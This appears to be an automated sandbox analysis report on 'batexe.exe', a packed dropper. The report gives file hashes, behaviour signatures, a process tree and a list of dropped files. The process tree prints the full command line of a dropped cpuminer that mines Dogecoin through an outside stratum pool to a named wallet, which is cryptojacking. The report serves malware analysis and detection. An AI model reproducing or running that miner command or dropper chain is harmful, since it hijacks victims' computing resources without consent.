73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
295s
max time network
300s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
23/02/2024, 15:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4652	b2e.exe
1152	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1152	cpuminer-sse2.exe
1152	cpuminer-sse2.exe
1152	cpuminer-sse2.exe
1152	cpuminer-sse2.exe
1152	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2180-4-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2180 wrote to memory of 4652	2180	batexe.exe	74
PID 2180 wrote to memory of 4652	2180	batexe.exe	74
PID 2180 wrote to memory of 4652	2180	batexe.exe	74
PID 4652 wrote to memory of 4992	4652	b2e.exe	75
PID 4652 wrote to memory of 4992	4652	b2e.exe	75
PID 4652 wrote to memory of 4992	4652	b2e.exe	75
PID 4992 wrote to memory of 1152	4992	cmd.exe	78
PID 4992 wrote to memory of 1152	4992	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2180
- C:\Users\Admin\AppData\Local\Temp\BC89.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\BC89.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\BC89.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4652
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BFC6.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4992
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1152

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\BC89.tmp\b2e.exe

Filesize
1.1MB

MD5
c8ddb9a1b99b955d28ce987616dc783a

SHA1
6a50a41aac042de84cbe5fe9cfa8ef171c1a15ba

SHA256
d42d045c7eaec84a0576fa2d1e67566cd65686605e6f66217c2da6ec9faa060a

SHA512
8804aa717bb5d9a88543175afd4ed3363ae6d1ff9846379f9bbfb7ff1b49cf0031fd6b1cbb0b1491a94d1158663021c8bf56c47050f3192b62a0c5bb5499d397

Download Submit
C:\Users\Admin\AppData\Local\Temp\BC89.tmp\b2e.exe

Filesize
1.2MB

MD5
05f6765e8266a1a7d81a80da7788444e

SHA1
e7afd0bf0dce889a026f4233c6705907083e6e23

SHA256
3256219f071d9bbeb2b3483abc7e647cbb550c0b74c415ace444bd8a334df9e8

SHA512
417d266a6eae32d630cf1322d3ab78f8547b09254ba3b5e2e544a7fd294de819754ab2f104ba2f3cab59a1fcfe7b0ea6f622712736079b7eec12a242b914293c

Download Submit
C:\Users\Admin\AppData\Local\Temp\BFC6.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
704KB

MD5
ce5f200d2d48a057722a957d5acc6426

SHA1
e7a8d4c0dc7b561dfa26e3fddaff015716187305

SHA256
cb450c8c0a952560f35f4b93f14357fc3856ee0b016eabf8bb4d20e9504d82df

SHA512
e7d3b203cc96d08b6d000f6845bbeb5777cd08babadbcb86266193ca68d8183973b3a92f5cf587df1f26bf04a182fa51001b7317c9a9e7ba868d1e26b897ee9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
512KB

MD5
a879c5fd4613dca566d5b1a782690dd5

SHA1
41c6063b0f0dee953e99713a5326856b55e08366

SHA256
3ee76359d6802a8fe11c5b144e18ffd3833bc7b49d66f190621d41e41ea0fc20

SHA512
e20f8f40822ca215c75767b8d4102583cfb3812c74dbc064a8619f214c164ab94da6bee0ae42c794a0af1847ff30c295b34d3015f87bfe597dba80339871ea96

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
256KB

MD5
11e8812bfa1d698cdeb73a16c1d7c963

SHA1
e8708fd452ab5946b380d0c353ac26acf289e548

SHA256
e0f9ddf8afd30511763f0cf792369e32c955f15d9529c00c5fe9298a80d74402

SHA512
fd54c9c6f3520b2ced6b42235ebfce6d8b622c53f1fbf810baace657a7d44430968b5ff90cd1d860dbdf7550dd8cd467636c862ff0dd0832f25145efccc7731e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
317KB

MD5
ee0679036f5a3b4fc0b92e1653e9a444

SHA1
279481a31cc908cd24799529d989e612f266739f

SHA256
cd234d4fde22f87a66762a0f10106395a78f2c72f6ef9c7d235f07782deb62be

SHA512
50d4f5df9592aa2c3112c74dfa0be7de274ba8f5bc854f8f2656df39566c2a76e39af66817e602b93f47a5be717e055f906fdf35fb677707e64e383a0cf0d138

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
256KB

MD5
1d86b9560854472453237bcbaa2e253f

SHA1
5a03a7902d250377a3e9f746badcb696e2c98228

SHA256
1493703a430c68bdcedcb4078486daca39a02820199e7b72017c7b1af66e1c8d

SHA512
afbc3d7f8e06e41db25d666999f4d162af7054a66b17a651ac8a7f092f83580a067bfa2f558be65ace5966dffaa8735fe7a579e88bf42b34eaa3e72cdec96699

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
64KB

MD5
e7317a0a343dc63f3fa3bf9ca6e93ff0

SHA1
0d48881feb76cf81fc46614bebfa3c134cada128

SHA256
277a43f17ccc4f0fba87c710212de61a41383bcb94410fa093b50ebd50347a63

SHA512
84ef51472db00cd4e90df3062a3cbc29a994c5cf470e54300d4a2f103ba8fb8279ec87b0561625ea1bccd80a7ad664c63457831b4eb919a7608099430b98a3d9

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
192KB

MD5
d73b46cd072058efc54c4b3885f47e13

SHA1
84771c2c4f5736ac08497737cba2a8634d9e9178

SHA256
3f62bb203bdcca4e489401897e0558cf33ad6fe890a9987f90f5c3894b965b34

SHA512
519c91b5b5a82c5a755d7d4295c040cfb6b0f029eb088a6bfc428db11e30d7f954ea6fd6de9b083d1781e1142737ea39572866ab5f669848dff7ef0ce34c79c7

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
128KB

MD5
9746d1ac79c8b499d8b2224394581fa7

SHA1
36b1985eabfd8131ad9f2b7f69c903a3fce67629

SHA256
77941fbe96e0c797e6cf5419ee32bd3fcee69629cba37750146656a660c37182

SHA512
61a6174e2aced5b85cd614ad2f9d3da24c6b91e1fc04e10ff818222c4323cd043a59708bd35af0de84b004bf492fbc157d72907cd1e7ddf7082fc2a3563ef183

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/1152-46-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1152-52-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1152-102-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1152-97-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1152-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1152-43-0x000000006FC40000-0x00000000714F5000-memory.dmp

Filesize
24.7MB

Download
memory/1152-44-0x0000000000F40000-0x0000000000FFC000-memory.dmp

Filesize
752KB

Download
memory/1152-45-0x0000000073DA0000-0x0000000073E38000-memory.dmp

Filesize
608KB

Download
memory/1152-38-0x0000000000F40000-0x0000000000FFC000-memory.dmp

Filesize
752KB

Download
memory/1152-92-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1152-41-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1152-57-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1152-62-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1152-72-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1152-77-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1152-87-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2180-4-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4652-51-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4652-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download